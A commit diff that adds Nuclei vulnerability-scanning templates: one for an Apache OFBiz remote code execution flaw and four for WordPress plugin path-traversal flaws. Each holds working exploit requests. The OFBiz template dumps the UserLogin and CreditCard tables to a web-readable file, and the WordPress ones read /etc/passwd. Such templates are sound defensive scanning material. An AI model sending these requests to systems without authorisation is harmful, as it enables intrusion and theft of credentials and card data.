Auto Update Nuclei [Fri Sep 6 12:34:11 UTC 2024] :robot:

plugins/apache/ofbiz/CVE-2024-45195.yaml

@@ -0,0 +1,64 @@
+id: CVE-2024-45195
+
+info:
+  name: Apache OFBiz - Remote Code Execution
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server
+  remediation: |
+    Users are recommended to upgrade to version 18.12.16, which fixes the issue.
+  reference:
+    - https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/
+    - https://ofbiz.apache.org/download.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-45195
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-45195
+    cwe-id: CWE-425
+    epss-score: 0.00045
+    epss-percentile: 0.16342
+    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
+  metadata:
+    vendor: apache
+    product: ofbiz
+    shodan-query:
+      - ofbiz.visitor=
+      - http.html:"ofbiz"
+    fofa-query:
+      - app="apache_ofbiz"
+      - body="ofbiz"
+  tags: cve,cve2024,apache,ofbiz,rce,instrusive
+
+variables:
+  filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+  - raw:
+      - |
+        POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        outpath=./themes/common-theme/webapp/common-theme/&maxrecords=&filename={{filename}}.txt&entityFrom_i18n=&entityFrom=&entityThru_i18n=&entityThru=&entitySyncId=&preConfiguredSetName=&entityName=UserLogin&entityName=CreditCard
+
+      - |
+        GET /common/{{filename}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "<?xml version="
+          - "entity-engine-xml"
+        condition: and
+
+      - type: word
+        part: content_type_2
+        words:
+          - "text/plain"
+
+# digest: 490a00463044022045c1d778dd7a3855b956682139c71220cca45be6d461f424ed0e22544caec55502202955c8246ca9f99ed2cb1ccdab4a1a139e9f2dc88af46d22649de7133799a305:922c64590222798bb761d5b6d8e72950

plugins/wordpress/wordpress/CVE-2014-4577.yaml

@@ -0,0 +1,60 @@
+id: CVE-2014-4577
+
+info:
+  name: WP AmASIN – The Amazon Affiliate Shop - Local File Inclusion
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    Absolute path traversal vulnerability in reviews.php in the WP AmASIN - The Amazon Affiliate Shop plugin 0.9.6 and earlier for WordPress allows remote attackers to read arbitrary files via a full pathname in the url parameter.
+  reference:
+    - https://codevigilant.com/disclosure/wp-plugin-wp-amasin-the-amazon-affiliate-shop-local-file-inclusion/
+    - https://wpscan.com/plugin/wp-amasin-the-amazon-affiliate-shop/
+    - https://github.com/superlink996/chunqiuyunjingbachang
+  classification:
+    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
+    cvss-score: 5
+    cve-id: CVE-2014-4577
+    cwe-id: CWE-22
+    epss-score: 0.00847
+    epss-percentile: 0.82512
+    cpe: cpe:2.3:a:websupporter:wp_amasin_-_the_amazon_affiliate_shop:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 1
+    vendor: websupporter
+    product: wp_amasin_-_the_amazon_affiliate_shop
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/"
+  tags: cve,cve2014,wordpress,wpscan,wp-plugin,lfi,wp,wp-amasin-the-amazon-affiliate-shop
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/reviews.php?url=/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+# digest: 4a0a0047304502200953c9a52adc445e3fb41704563b1179e522ac19fde2c181baa92b3a9cb00195022100a06a6b65b2eb5475d98ed66ab7ad066e35e89f9d7f7d479ec32a5a5827380ce0:922c64590222798bb761d5b6d8e72950

plugins/wordpress/wordpress/CVE-2014-4941.yaml

@@ -0,0 +1,60 @@
+id: CVE-2014-4941
+
+info:
+  name: Cross RSS 1.7 - Local File Inclusion
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    Absolute path traversal vulnerability in Cross-RSS (wp-cross-rss) plugin 1.7 for WordPress allows remote attackers to read arbitrary files via a full pathname in the rss parameter to proxy.php.
+  reference:
+    - https://wordpress.org/plugins/cross-rss/
+    - https://codevigilant.com/disclosure/wp-plugin-cross-rss-local-file-inclusion/
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-4941
+  classification:
+    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
+    cvss-score: 5
+    cve-id: CVE-2014-4941
+    cwe-id: CWE-22
+    epss-score: 0.00845
+    epss-percentile: 0.82498
+    cpe: cpe:2.3:a:cross-rss_plugin_project:wp-cross-rss:1.7:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: cross-rss_plugin_project
+    product: wp-cross-rss
+    framework: wordpress
+  tags: cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"/wp-content/plugins/cross-rss/")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+# digest: 490a0046304402206f27b04fcbbe7b56e63296269911d57d4a47ffb3160aa729c9f39c65f5eedd2f02203b98c37745d534a7d13dcdb8d789057d13f50e78f24bde8755b0dd6e50d60e2f:922c64590222798bb761d5b6d8e72950

plugins/wordpress/wordpress/CVE-2014-5181.yaml

@@ -0,0 +1,54 @@
+id: CVE-2014-5181
+
+info:
+  name: Last.fm Rotation 1.0 - Path Traversal
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    Directory traversal vulnerability in lastfm-proxy.php in the Last.fm Rotation (lastfm-rotation) plugin 1.0 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the snode parameter.
+  classification:
+    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
+    cvss-score: 5
+    cve-id: CVE-2014-5181
+    cwe-id: CWE-22
+    epss-score: 0.00845
+    epss-percentile: 0.82498
+    cpe: cpe:2.3:a:last.fm_rotation_plugin_project:lastfm-rotation_plugin:1.0:*:*:*:*:wordpress:*:*
+  metadata:
+    vendor: last.fm_rotation_plugin_project
+    product: lastfm-rotation_plugin
+    framework: wordpress
+  tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,lastfm-rotation
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"/wp-content/plugins/lastfm-rotation/")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+# digest: 4a0a0047304502204ec2c1ec272175f1a216887b21255e30b7579788096bb7e399291f2b3c6beac1022100c569a83ce0b1ea82e5df1fba4314afaac2b46b399779994ac3663a12daf643e0:922c64590222798bb761d5b6d8e72950

plugins/wordpress/wordpress/CVE-2014-5187.yaml

@@ -0,0 +1,60 @@
+id: CVE-2014-5187
+
+info:
+  name: Tom M8te (tom-m8te) Plugin 1.5.3 - Directory Traversal
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    Directory traversal vulnerability in the Tom M8te (tom-m8te) plugin 1.5.3 for WordPress allows remote attackers to read arbitrary files via the file parameter to tom-download-file.php.
+  reference:
+    - https://wpscan.com/vulnerability/3095c3f3-9cdc-49f8-8478-c2922f0a442a/
+    - https://codevigilant.com/disclosure/wp-plugin-tom-m8te-local-file-inclusion/
+  classification:
+    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
+    cvss-score: 5
+    cve-id: CVE-2014-5187
+    cwe-id: CWE-22
+    epss-score: 0.00845
+    epss-percentile: 0.82498
+    cpe: cpe:2.3:a:tom_m8te_plugin_project:tom-m8te_plugin:1.5.3:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: tom_m8te_plugin_project
+    product: tom-m8te_plugin
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/tom-m8te/"
+  tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,tom-m8te
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"/wp-content/plugins/tom-m8te/")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a00483046022100bb297bf252da16e9350223cd423c54420a8079d1ecc051afd2a0e7d04795ad2c022100a9b4094dfee78bd65b4959c08fd62e0c180d939183c80367280ce08372cd7d41:922c64590222798bb761d5b6d8e72950